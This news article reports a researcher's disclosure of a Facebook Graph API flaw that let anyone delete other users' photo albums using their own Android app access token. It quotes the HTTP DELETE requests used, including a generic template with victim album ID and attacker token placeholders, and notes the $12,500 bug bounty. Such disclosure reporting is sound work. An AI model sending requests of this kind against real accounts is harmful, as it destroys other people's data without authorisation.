Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|Europe Confirms Record €4.1B Penalty Against Google for Android Practices|U.S. CISA adds a Microsoft SharePoint Server flaw to its Known Exploited Vulnerabilities catalog|430,000 FortiGate Devices Exposed in FortiBleed Ransomware Link|Adobe fixed multiple maximum-severity flaws in ColdFusion and Campaign Classic|Alleged Scattered Spider Hacker Extradited to U.S. to Face Cybercrime Charges|Oracle E-Business Suite Flaw Under Active Attack, 950 Systems Exposed|Azure CLI Targeted in LSHIY Password Spray Campaign Across 64 Orgs|CISA Warns BlueHammer Flaw Is Now Exploited in Ransomware Attacks|RustDuck: The Botnet That’s Still Small but Engineering Like It Plans to Grow|GuardFall Flaw Hits 10 of 11 Popular Open-Source AI Agents|XSS.is, The Forum That Ran the Ransomware Supply Chain Is Down. The Market Isn’t|U.S. CISA adds SimpleHelp flaw to its Known Exploited Vulnerabilities catalog|
Advertisement

Ad Placeholder

Full Width × 90

Hacking

How to hack Facebook photo album of every user

An Indian security expert Laxman Muthiyah exploited a vulnerability in Facebook Graph API mechanism to delete Facebook photo albums of every user. A critical flaw in the popular social network Facebook recently discovered could allow ill-intentioned to completely delete users’ Facebook photo album without being authenticated. According the security expert Laxman Muthiyah the vulnerability resides […]

How to hack Facebook photo album of every user

An Indian security expert Laxman Muthiyah exploited a vulnerability in Facebook Graph API mechanism to delete Facebook photo albums of every user.

A critical flaw in the popular social network Facebook recently discovered could allow ill-intentioned to completely delete users’ Facebook photo album without being authenticated.

According the security expert Laxman Muthiyah the vulnerability resides in Facebook Graph API mechanism.

“a hacker to delete any photo album on Facebook. Any photo album owned by an user or a page or a group could be deleted.” said Laxman.

The Indian security researcher has discovered a way to delete Facebook photo albums of every Facebook users in a few seconds.

“I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn’t it? Yeah and also it uses the same Graph API,” he explained.

The researcher discovered that by using his own “access token” generated for mobile version of Facebook could be exploited to remove any photo albums posted by any other Facebook User despite theoretically Facebook Graph API requires an access token to access and modify data.However, Muthiyah

“Graph API is primary way for developers to read and write the users data. All the Facebook apps of now are using Graph API. In general Graph API requires an access token to read or write users data. Read more about Graph API here. ” wrote Muthiyah in a blog post.

Facebook photo album

The researcher demonstrates that it is quite easy for an attacker to delete a the Facebook photo album from the victim’s Facebook account, the attacker only needs to send an HTTP-based Graph API request customized victim’s photo album ID. In this way the attacker’s own access token generated for ‘Facebook for android’ app.

“I decided to try it with Facebook for mobile access token because we can see delete option for all photo albums in Facebook mobile application isn’t it? Yeah and also it uses the same Graph API. so took a album id & Facebook for android access token of mine and tried it.” said the researcher.

Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :- true
Album(518171421550249) got deleted :D so whats the next step? Took victim's album id and tried to delete it. I was very curious to see the result. 
Request :-
DELETE /518171421550249 HTTP/1.1
Host :  graph.facebook.com 
Content-Length: 245
access_token=<Facebook_for_Android_Access_Token>
Response :-true
OMG :D the album got deleted! So i got the key to delete all of your Facebook photos :P lol :D "

Resuming a sample request is 

DELETE /<Victim’s_photo_album_id> HTTP/1.1
Host : graph.facebook.com 
Content-Length: 245
access_token=<Your(Attacker)_Facebook_for_Android_Access_Token>

Video POC

Facebook included the flaw discovered by the research in its Bug Bounty program rewarding him with $12,500 USD for reporting the flaw in Facebook photo album.

Pierluigi Paganini

(Security Affairs –  Facebook photo album, hacking)